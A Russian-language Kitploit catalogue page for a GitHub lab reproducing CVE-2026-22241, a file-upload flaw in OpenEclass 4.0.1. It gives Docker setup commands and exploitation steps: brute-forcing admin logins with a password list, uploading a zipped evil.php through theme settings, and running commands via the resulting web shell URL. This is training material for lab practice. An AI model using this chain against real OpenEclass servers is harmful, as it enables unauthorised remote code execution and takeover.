Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-22241 — Лабораторная среда для CVE-2026-22241 | Kitploit
Инструменты/GitHubGitHub/cves-labs/cve-2026-22241
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubcves-labs/cve-2026-22241

CVE-2026-22241

Лабораторная среда для CVE-2026-22241

Репозиторий
1 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-22241

Лабораторная среда для CVE-2026-22241

Описание уязвимости:

  • Уязвимость: Неограниченная загрузка файла опасного типа.
  • Воздействие: Удаленное выполнение кода (RCE).
  • Описание: Эта ошибка позволяет злоумышленнику с правами администратора загрузить вредоносный PHP-файл (Web Shell), что приводит к полной компрометации целостности и безопасности веб-сервера.
  • Целевая система: Образовательная инфраструктура OpenClass.

1. Сборка окружения

sudo git clone https://github.com/CVEs-Labs/CVE-2026-22241.git

open https://www.openeclass.org/en/previous-versions/ and download openeclass-4.0.1.zip

sudo apt update && sudo apt install docker.io docker-compose -y

sudo systemctl start docker

sudo cp openeclass-4.0.1.zip CVE-2026-22241

cd CVE-2026-22241

sudo mkdir html

sudo unzip openeclass-4.0.1.zip -d ./temp_folder

sudo mv ./temp_folder/openeclass-4.0.1/* ./html/

sudo rm -rf ./temp_folder

sudo rm -rf openeclass-4.0.1.zip

sudo chown -R $USER:www-data html/

sudo chmod -R 775 html/

sudo docker-compose up -d

sudo docker exec -it eclass-web bash -c "apt-get update && apt-get install -y libpng-dev libzip-dev libicu-dev libxml2-dev libldap2-dev && docker-php-ext-configure ldap --with-libdir=lib/x86_64-linux-gnu/ && docker-php-ext-install zip gd pdo pdo_mysql intl soap ldap && apache2ctl restart"

sudo docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' eclass-web

http://ip-docker

изображение

2. Эксплуатация уязвимости:

для списка ключей в ZAP (Brute Force): https://gitlab.com/kalilinux/packages/seclists/-/blob/kali/master/Passwords/Common-Credentials/Pwdb_top-1000.txt

zip poc.zip evil.php

на странице eclass: перейдите в инструменты администратора -> настройки темы -> затем загрузите poc.zip

на новой странице:

http://ip-docker/courses/theme_data/evil.php?cmd=whoami

http://ip-docker/courses/theme_data/evil.php?cmd=id

Скачать инструмент